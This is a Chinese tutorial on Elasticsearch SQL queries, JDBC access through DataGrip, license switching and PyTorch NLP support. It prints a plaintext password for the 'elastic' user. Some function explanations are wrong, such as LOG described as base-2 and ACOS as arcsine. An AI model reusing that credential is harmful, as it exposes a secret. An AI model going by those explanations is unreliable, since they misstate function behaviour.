elasticsearch | my- sql- index | TABLE | INDEX
# 请求
GET _sql? format= txt
{
"query" : "" "
describe "my-eql-index"
"" "
}
# 返回
column | type | mapping
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -
@timestamp | BIGINT | long
destination | STRUCT | object
destination. address | VARCHAR | text
destination. address. keyword | VARCHAR | keyword
destination. port | VARCHAR | text
destination. port. keyword | VARCHAR | keyword
dll | STRUCT | object
dll. name | VARCHAR | text
dll. name. keyword | VARCHAR | keyword
dll. path | VARCHAR | text
dll. path. keyword | VARCHAR | keyword
event | STRUCT | object
event. category | VARCHAR | text
event. category. keyword | VARCHAR | keyword
event. type | VARCHAR | text
event. type. keyword | VARCHAR | keyword
logon_id | BIGINT | long
network | STRUCT | object
network. direction | VARCHAR | text
network. direction. keyword | VARCHAR | keyword
network. protocol | VARCHAR | text
network. protocol. keyword | VARCHAR | keyword
process | STRUCT | object
process. command_line | VARCHAR | text
process. command_line. keyword | VARCHAR | keyword
process. entity_id | VARCHAR | text
process. entity_id. keyword | VARCHAR | keyword
process. executable | VARCHAR | text
process. executable. keyword | VARCHAR | keyword
process. name | VARCHAR | text
process. name. keyword | VARCHAR | keyword
process. parent | STRUCT | object
process. parent. entity_id | VARCHAR | text
process. parent. entity_id. keyword | VARCHAR | keyword
process. parent. executable | VARCHAR | text
process. parent. executable. keyword| VARCHAR | keyword
process. parent. name | VARCHAR | text
process. parent. name. keyword | VARCHAR | keyword
process. pid | BIGINT | long
process. ppid | BIGINT | long
registry | STRUCT | object
registry. key | VARCHAR | text
registry. key. keyword | VARCHAR | keyword
registry. path | VARCHAR | text
registry. path. keyword | VARCHAR | keyword
registry. value | VARCHAR | text
registry. value. keyword | VARCHAR | keyword
source | STRUCT | object
source. address | VARCHAR | text
source. address. keyword | VARCHAR | keyword
source. port | VARCHAR | text
source. port. keyword | VARCHAR | keyword
user | STRUCT | object
user. domain | VARCHAR | text
user. domain. keyword | VARCHAR | keyword
user. full_name | VARCHAR | text
user. full_name. keyword | VARCHAR | keyword
user. id | VARCHAR | text
user. id. keyword | VARCHAR | keyword
在 ES 中使用 SQL 查询的语法与在数据库中使用基本一致,具体格式如下: # 基本 SQL 格式
SELECT select_expr [ , ... ]
[ FROM table_name ]
[ WHERE condition ]
[ GROUP BY grouping_element [ , ... ] ]
[ HAVING condition]
[ ORDER BY expression [ ASC | DESC ] [ , ... ] ]
[ LIMIT [ count ] ]
[ PIVOT ( aggregation_expr FOR column IN ( value [ [ AS ] alias ] [ , ... ] ) ) ]
# 请求
GET _sql? format= txt
{
"query" : "" "
SELECT * FROM "my-sql-index"
"" "
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
lisi | BIGDATA | 482 | 2022 - 05 - 02T00: 00 : 00 . 000Z
wangwu | SCALA | 604 | 2022 - 05 - 03T00: 00 : 00 . 000Z
# 请求
POST _sql? format= txt
{
"query" : "" " SELECT * FROM " my- sql- index" where name = 'JAVA' " ""
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
# 请求
GET _sql? format= txt
{
"query" : "" "
SELECT release_date FROM "my-sql-index" group by release_date
"" "
}
# 返回
release_date
-- -- -- -- -- -- -- -- -- -- -- --
2022 - 05 - 01T00: 00 : 00 . 000Z
2022 - 05 - 02T00: 00 : 00 . 000Z
2022 - 05 - 03T00: 00 : 00 . 000Z
# 请求
GET _sql? format= txt
{
"query" : "" "
SELECT sum ( page_count) , release_date as datacnt FROM "my-sql-index" group by release_date having sum ( page_count) > 600
"" "
}
# 返回
sum ( page_count) | datacnt
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
604 | 2022 - 05 - 03T00: 00 : 00 . 000Z
# 请求
GET _sql? format= txt
{
"query" : "" "
select * from "my-sql-index" order by page_count desc
"" "
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
wangwu | SCALA | 604 | 2022 - 05 - 03T00: 00 : 00 . 000Z
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
lisi | BIGDATA | 482 | 2022 - 05 - 02T00: 00 : 00 . 000Z
# 请求
GET _sql? format= txt
{
"query" : "" "
select * from "my-sql-index" limit 2
"" "
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
lisi | BIGDATA | 482 | 2022 - 05 - 02T00: 00 : 00 . 000Z
cursor:游标(cursor)是系统为用户开设的一个数据缓冲区,存储 sql 语句的执行结果,每个游标区都有一个名字,用户可以用 sql 语句逐一从游标中获取记录,并赋给主变量,交由主语言进一步处理。就本质而言,游标实际上是一种能从包括多条数据记录的结果集中每次提取一条或多条记录的机制。 # 请求
POST _sql? format= json
{
"query" : "" " SELECT * FROM " my- sql- index" order by page_count desc " "" ,
"fetch_size" : 2
}
# 返回cursor
{
"columns" : [
{
"name" : "author" ,
"type" : "text"
} ,
{
"name" : "name" ,
"type" : "text"
} ,
{
"name" : "page_count" ,
"type" : "long"
} ,
{
"name" : "release_date" ,
"type" : "datetime"
}
] ,
"rows" : [
[
"wangwu" ,
"SCALA" ,
604 ,
"2022-05-03T00:00:00.000Z"
] ,
[
"zhangsan" ,
"JAVA" ,
561 ,
"2022-05-01T00:00:00.000Z"
]
] ,
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
# 返回结果中的 cursor 就是缓冲区的标识,这就意味着可以从缓冲区中直接获取后续数据,操作上有点类似于迭代器,可多次执行。
# 此处游标 cursor 值需要根据读者执行的操作进行修改,请勿直接使用
POST / _sql? format= json
{
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
# 返回
{
"rows" : [
[
"lisi" ,
"BIGDATA" ,
482 ,
"2022-05-02T00:00:00.000Z"
]
]
}
# 如果关闭缓冲区,执行下面指令即可
POST _sql/ close
{
"cursor" : "spCTBERGTAB0kc9Kw0AQxmfWUCQUvOUqPkBA8U/xaFS0tlijVaqXZZtskoVkN91sSQQfQvBNxLuPpklMsR6cw/J9szsf/GbxCTABgtDUV11brYK6hXYkeBrSQmlj5yzmNFBLaaBHI6ELgwhopUrGP+/xAzeAkFo0R5uw14n2uslGq8eWJlEaiCVZxoGs55K+5ilnBachMxy3C6NFYFpDVW6EkiylRmScSiZVQfDl/fXNwn727BaL1BUy5JUzOHAf01Cc3lUj/3o2uRnfntHjEpxDLx8m51cLn2XD8dQ7GcaT/arsWHc+nfv5EfN2q8tpeFE+6MEomOfezAf8LxDAXi3MwqjDQsvwytSwUYv3a9cwVzvD6C/uZsPZ0NXj9R98AwAA//8DAA=="
}
在 ES 中使用 SQL 查询的聚合语法与在数据库中使用基本一致 Min:最小 Max:最大 Avg:平均 Sum:求和 Count(*):行数 Distinct:去重 # 请求
GET _sql? format= txt
{
"query" : "" "
SELECT
MIN ( page_count) min, MAX ( page_count) max, AVG ( page_count) avg, SUM ( page_count) sum, COUNT ( * ) count,
COUNT ( DISTINCT name) dictinct_count FROM "my-sql-index"
"" "
}
# 返回
min | max | avg | sum | count | dictinct_count
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -
482 | 604 | 549.0 | 1647 | 3 | 3
# Equality
SELECT * FROM "my-sql-index" WHERE name = 'JAVA'
# Null Safe Equality
SELECT 'elastic' <= > null AS "equals"
SELECT null <= > null AS "equals"
# Inequality
SELECT * FROM "my-sql-index" WHERE name < > 'JAVA'
SELECT * FROM "my-sql-index" WHERE name != 'JAVA'
# Comparison
SELECT * FROM "my-sql-index" WHERE page_count > 500
SELECT * FROM "my-sql-index" WHERE page_count >= 500
SELECT * FROM "my-sql-index" WHERE page_count < 500
SELECT * FROM "my-sql-index" WHERE page_count <= 500
# BETWEEN
SELECT * FROM "my-sql-index" WHERE page_count between 100 and 500
# Is Null / Is Not Null
SELECT * FROM "my-sql-index" WHERE name is not null
SELECT * FROM "my-sql-index" WHERE name is null
# IN
SELECT * FROM "my-sql-index" WHERE name in ( 'JAVA' , 'SCALA' )
# AND
SELECT * FROM "my-sql-index" WHERE name = 'JAVA' AND page_count > 100
# OR
SELECT * FROM "my-sql-index" WHERE name = 'JAVA' OR name = 'SCALA'
# NOT
SELECT * FROM "my-sql-index" WHERE NOT name = 'JAVA'
# 加减乘除
select 1 + 1 as x
select 1 - 1 as x
select - 1 as x
select 6 * 6 as x
select 30 / 5 as x
select 30 % 7 as x
# 类型转换
SELECT '123' : : long AS long
# LIKE 通配符
SELECT * FROM "my-sql-index" WHERE name like 'JAVA%'
SELECT * FROM "my-sql-index" WHERE name like 'JAVA_'
# 如果需要匹配通配符本身, 使用转义字符
SELECT * FROM "my-sql-index" WHERE name like 'JAVA/%' ESCAPE '/'
# RLIKE 不要误会,这里的 R 表示的不是方向,而是正则表示式 Regex
SELECT * FROM "my-sql-index" WHERE name like 'JAV*A'
SELECT * FROM "my-sql-index" WHERE name rlike 'JAV*A'
# 尽管 LIKE 在 Elasticsearch SQL 中搜索或过滤时是一个有效的选项,但全文搜索 MATCH 和 QUERY 速度更快、功能更强大,并且是首选替代方案。
# FIRST / FIRST_VALUE : FIRST ( 第一个字段,排序字段)
SELECT first ( name, release_date) FROM "my-sql-index"
SELECT first_value ( substring ( name, 2 , 1 ) ) FROM "my-sql-index"
# LAST / LAST_VALUE : LAST ( 第一个字段,排序字段)
SELECT last ( name, release_date) FROM "my-sql-index"
SELECT last_value ( substring ( name, 2 , 1 ) ) FROM "my-sql-index"
# KURTOSIS 量化字段的峰值分布
SELECT KURTOSIS ( page_count) FROM "my-sql-index"
# MAD
SELECT MAD ( page_count) FROM "my-sql-index"
# HISTOGRAM : 直方矩阵
SELECT HISTOGRAM ( page_count, 100 ) as c, count ( * ) FROM "my-sql-index" group by c
# ABS :求数字的绝对值
select ABS ( page_count) from "myindex" limit 5
# CBRT :求数字的立方根,返回 double
select page_count v, CBRT ( page_count) cbrt from "myindex" limit 5
# CEIL :返回大于或者等于指定表达式最小整数(double)
select page_count v, CEIL ( page_count) from "myindex" limit 5
# CEILING :等同于 CEIL
select page_count v, CEILING ( page_count) from "myindex" limit 5
# E :返回自然常数 e ( 2.718281828459045 )
select page_count, E ( page_count) from "myindex" limit 5
# ROUND :四舍五入精确到个位
select ROUND ( - 3.14 )
# FLOOR :向下取整
select FLOOR ( 3.14 )
# LOG :计算以 2 为底的自然对数
select LOG ( 4 )
# LOG10 :计算以 10 为底的自然对数
select LOG10 ( 100 )
# SQRT :求一个非负实数的平方根
select SQRT ( 9 )
# EXP :此函数返回 e ( 自然对数的底) 的 X 次方的值
select EXP ( 3 )
# DEGREES :返回 X 从弧度转换为度值
select DEGREES ( x)
# RADIANS :返回 X 从度转换成弧度的值
select RADIANS ( x)
# SIN :返回 X 的正弦
select SIN ( x)
# COS :返回 X ,X 值是以弧度给出的余弦值
select COS ( 角度)
# TAN :返回参数 X ,表示以弧度的切线值
select TAN ( 角度)
# ASIN :返回 X 的反正弦,X 的值必须在- 1 至 1 范围内,返回 NULL
select ASIN ( x)
# ACOS :返回 X 的反正弦,X 值必须- 1 到 1 之间范围否则将返回 NULL
select ACOS ( x)
# ATAN :返回 X 的反正切
select ATAN ( x)
# SINH :返回 X 的双曲正弦值
select SINH ( x)
# COSH :返回 X 的双曲余弦值
select COSH ( x)
# YEAR :
SELECT YEAR ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS year
# MONTH_OF_YEAR ( ) or MONTH ( ) :
SELECT MONTH ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS month
# WEEK_OF_YEAR ( ) or WEEK ( ) :
SELECT WEEK ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS week
# DAY_OF_YEAR ( ) or DOY ( ) ,效果等同于 EXTRACT ( < datetime_function> FROM
< expression> ) :
SELECT DOY ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS day
# DAY_OF_MONTH ( ) , DOM ( ) , or DAY ( ) :
SELECT DAY ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS day
# DAY_OF_WEEK ( ) or DOW ( ) :
SELECT DOW ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS day
# HOUR_OF_DAY ( ) or HOUR ( ) :
SELECT HOUR ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS hour
# MINUTE_OF_DAY ( ) :
SELECT MINUTE_OF_DAY ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS minute
# MINUTE_OF_HOUR ( ) or MINUTE ( ) :
SELECT MINUTE ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS minute
# SECOND_OF_MINUTE ( ) or SECOND ( ) :
SELECT SECOND ( CAST ( '2022-05-01T00:00:00Z' AS TIMESTAMP ) ) AS second
# MATCH :MATCH ( 匹配字段,规则, 配置参数 ( 可选) )
SELECT * FROM "my-sql-index" where MATCH ( name, 'JAVA' ) SELECT * FROM "my-sql-index" where MATCH ( name, 'java' )
# MATCH :MATCH ( ( '匹配字段^权重 1,匹配字段^权重 2' ,规则, 配置参数 ( 可选) )
SELECT * FROM "my-sql-index" where MATCH ( 'author^2,name^5' , 'java' )
# QUERY
SELECT * FROM "my-sql-index" where QUERY ( 'name:Java' )
# SCORE : 评分
SELECT * , score ( ) FROM "my-sql-index" where QUERY ( 'name:Java' )
# ASCII : 字符串转成 ASC 码
SELECT ASCII ( 'Elastic' )
# BIT_LENGTH : 位长度
SELECT BIT_LENGTH ( 'Elastic' )
SELECT BIT_LENGTH ( '中国' )
# CHAR :转换字符
SELECT CHAR ( 69 )
# CHAR_LENGTH :字符长度
SELECT CHAR_LENGTH ( 'Elastic' )
# CONCAT : 合并
SELECT CONCAT ( 'Elastic' , 'search' )
# INSERT : INSERT ( 字符串,起始位置,长度,插入的内容)
SELECT INSERT ( 'Elastic' , 8 , 1 , 'search' )
SELECT INSERT ( 'Elastic' , 7 , 1 , 'search' )
# LCASE :转换小写
SELECT LCASE ( 'Elastic' )
# LEFT : 获取左边最多 N 个字符
SELECT LEFT ( 'Elastic' , 3 )
# LENGTH
SELECT length ( 'Elastic' )
SELECT length ( '中国' )
# LOCATE : LOCATE ( 表达式,字符串,起始位置) ,获取满足条件的位置
SELECT LOCATE ( 'a' , 'Elasticsearch' )
SELECT LOCATE ( 'a' , 'Elasticsearch' , 5 )
# LTRIM :去除左边的空格
SELECT LTRIM ( ' Elastic' )
# OCTET_LENGTH : 字节长度
SELECT OCTET_LENGTH ( 'Elastic' )
SELECT OCTET_LENGTH ( '中国' )
# POSITION :获取指定字符串的位置
SELECT POSITION ( 'Elastic' , 'Elasticsearch' )
# REPEAT :将字符串重复指定次数
SELECT REPEAT ( 'Elastic' , 3 )
# REPLACE :替换数据
SELECT REPLACE ( 'Elastic' , 'El' , 'Fant' )
# RIGHT :从右边获取指定数量的数据
SELECT RIGHT ( 'Elastic' , 3 )
# RTRIM :去除右边的空格
SELECT RTRIM ( 'Elastic ' )
# SPACE : 生成指定数量的空格
SELECT concat ( SPACE ( 3 ) , 'abc' )
# STARTS_WITH : 判断是否以指定字符串开头
SELECT STARTS_WITH ( 'Elasticsearch' , 'Elastic' )
# SUBSTRING : 截取字符串,必须传递三个参数
SELECT SUBSTRING ( 'Elasticsearch' , 0 , 7 )
# TRIM :去掉首尾空格
SELECT TRIM ( ' Elastic ' ) AS trimmed
# UCASE : 转换大写
SELECT UCASE ( 'Elastic' )
# 多重分支判断
SELECT CASE 5
WHEN 1 THEN 'elastic'
WHEN 2 THEN 'search'
WHEN 3 THEN 'elasticsearch'
ELSE 'default'
END AS "case"
SELECT CASE WHEN 1 > 2 THEN 'elastic' WHEN 2 > 10 THEN 'search' ELSE 'default'
END AS "case"
# IFNULL
SELECT IFNULL ( 'elastic' , null ) AS "ifnull"
SELECT IFNULL ( null , 'search' ) AS "ifnull"
# IIF
SELECT IIF ( 1 < 2 , 'TRUE' , 'FALSE' ) AS result1, IIF ( 1 > 2 , 'TRUE' , 'FALSE' ) AS result2
# ISNULL
SELECT ISNULL ( 'elastic' , null ) AS "isnull" SELECT ISNULL ( null , 'search' ) AS "isnull"
# LEAST : 获取除 null 外的最小值
SELECT LEAST ( null , 2 , 11 ) AS "least"
SELECT LEAST ( null , null , null , null ) AS "least"
# NULLIF : 如果两个字符串不相同,则返回第一个字符串,如果相同,返回 null
SELECT NULLIF ( 'elastic' , 'search' ) AS "nullif"
SELECT NULLIF ( 'elastic' , 'elastic' ) AS "nullif"
# NVL : 返回第一个不是 null 的字符串,如果都是 null , 那么返回 Null
SELECT NVL ( 'elastic' , null ) AS "nvl"
SELECT NVL ( null , null ) AS "nvl"
# ES 集群
SELECT DATABASE ( )
# 用户
SELECT USER ( )
DataGrip 是 JetBrains 发布的多引擎数据库环境, 这里采用 DataGrip 工具连接 Elasticsearch 下载地址:https://www.jetbrains.com/datagrip/ 历史版本:https://www.jetbrains.com.cn/datagrip/download/other.html 我本次安装的版本是 2024.2.2 版本:https://pan.baidu.com/s/1pBQ8lqx2CUc7QR4eN3yaBw?pwd=8888 先下载 jdbc 驱动程序文件,我们这边下载和 es 一致的 8.15 版本 下载地址:https://www.elastic.co/downloads/past-releases/jdbc-client-8-15-0
身份验证:用户名和密码是 es 的登录用户密码 用户名 elastic 密码 1yslqH3=VZBBZAwPbYeA URL:jdbc🇪🇸//https://localhost:9200
配置证书文件路径,这里使用 ES 自动生成的证书即可,在ES配置文件夹config/certs下。
默认情况下,JDBC 客户端必须为白金级别才可以使用,ES 的默认license 为 basic,是不能使用相关功能的。
为了能够使用相关功能,这里可以将当前的 ES 软件的 License 暂时设置为试用版。测试完成后,改回 basic 版即可。注意试用只能激活一次。如果再次使用需要重装。操作请慎重。 # 查看当前License
Get _license
# 返回
{
"license" : {
"status" : "active" ,
"uid" : "e8528187-0dea-4955-81cb-4b90211a6d3b" ,
"type" : "basic" ,
"issue_date" : "2025-01-24T07:10:24.625Z" ,
"issue_date_in_millis" : 1737702624625 ,
"max_nodes" : 1000 ,
"max_resource_units" : null ,
"issued_to" : "elasticsearch" ,
"issuer" : "elasticsearch" ,
"start_date_in_millis" : - 1
}
}
# 更改 License 类型 - trial
POST _license/ start_trial? acknowledge= true
# 更改 License 类型 - basic
POST _license/ start_basic? acknowledge= true
随着 8.0 的发布,Elastic 很高兴能够将 PyTorch 机器学习模型上传到 Elasticsearch 中,以在 Elastic Stack 中提供现代自然语言处理 (NLP)。 现在,Elasticsearch 用户能够集成用于构建 NLP 模型的最流行的格式之一,并将这些模型作为 NLP 数据管道的一部分通过我们的Inference processor 整合到 Elasticsearch 中。 NLP 是指我们可以使用软件来操作和理解口语或书面文本或自然语言的方式。 2018 年,Google 开源了一种用于 NLP 预训练的新技术,称为来自 Transformers 的双向编码器呈现,或 BERT。 BERT 通过在没有任何人工参与的情况下对互联网大小的数据集(例如,想想所有的维基百科和数字书籍)进行训练来利用 “transfer learning”。 Transfer learning 允许对 BERT 模型进行预训练以进行通用语言理解。一旦模型只经过一次预训练,它就可以被重用并针对更具体的任务进行微调,以了解语言的使用方式。 为了支持类 BERT 模型(使用与 BERT 相同的标记器的模型),Elasticsearch 将首先通过 PyTorch 模型支持支持大多数最常见的 NLP 任务。 PyTorch 是最受欢迎的现代机器学习库之一,拥有大量活跃用户,它是一个支持深度神经网络的库,例如 BERT 使用的Transformer 架构。 以下是一些示例 NLP 任务:
情绪分析:用于识别正面与负面陈述的二元分类 命名实体识别 (NER):从非结构化文本构建结构,尝试提取名称、位置或组织等细节 文本分类:零样本分类允许你根据你选择的类对文本进行分类,而无需进行预训练。 文本嵌入:用于 k 近邻 (kNN) 搜索 在将 NLP 模型集成到 Elastic 平台时,我们希望为上传和管理模型提供出色的用户体验。使用用于上传 PyTorch 模型的 Eland 客户端和用于管理 Elasticsearch 集群上模型的Kibana 的 ML 模型管理用户界面,用户可以尝试不同的模型并很好地了解它们在数据上的表现。我们还希望使其可跨集群中的多个可用节点进行扩展,并提供良好的推理吞吐量性能。 为了使这一切成为可能,我们需要一个机器学习库来执行推理。在 Elasticsearch 中添加对 PyTorch 的支持需要使用原生库 libtorch,它支持 PyTorch,并且仅支持已导出或保存为 TorchScript 表示的 PyTorch 模型。这是 libtorch 需要的模型的表示,它将允许Elasticsearch 避免运行 Python 解释器。
通过与在 PyTorch 模型中构建 NLP 模型的最流行的格式之一集成,Elasticsearch 可以提供一个平台,该平台可处理大量 NLP 任务和用例。许多优秀的库可用于训练 NLP 模型,因此我们暂时将其留给其他工具。无论你是使用 PyTorch NLP、Hugging Face Transformers 还是 Facebook 的 fairseq 等库来训练模型,你都可以将模型导入 Elasticsearch 并对这些模型进行推理。 Elasticsearch 推理最初将仅在摄取时进行,未来还可以扩展以在查询时引入推理。 Elasticsearch 一直是进行 NLP 的好地方,但从历史上看,它需要在 Elasticsearch 之外进行一些处理,或者编写一些非常复杂的插件。 借助 8.0,用户现在可以在 Elasticsearch 中更直接地执行命名实体识别、情感分析、文本分类等操作——无需额外的组件或编码。 不仅在 Elasticsearch 中本地计算和创建向量在水平可扩展性方面是“胜利”(通过在服务器集群中分布计算)——这一变化还为 Elasticsearch 用户节省了大量时间和精力。
借助 Elastic 8.0,用户可以直接在 Elasticsearch 中使用 PyTorch 机器学习模型(例如 BERT),并在 Elasticsearch 中使用这些模型进行推理。通过使用户能够直接在 Elasticsearch 中执行推理,将现代 NLP 的强大功能集成到搜索应用程序和体验、本质上更高效(得益于 Elasticsearch 的分布式计算能力)和 NLP 本身比以往任何时候都更容易 变得更快,因为你不需要将数据移出到单独的进程或系统中。
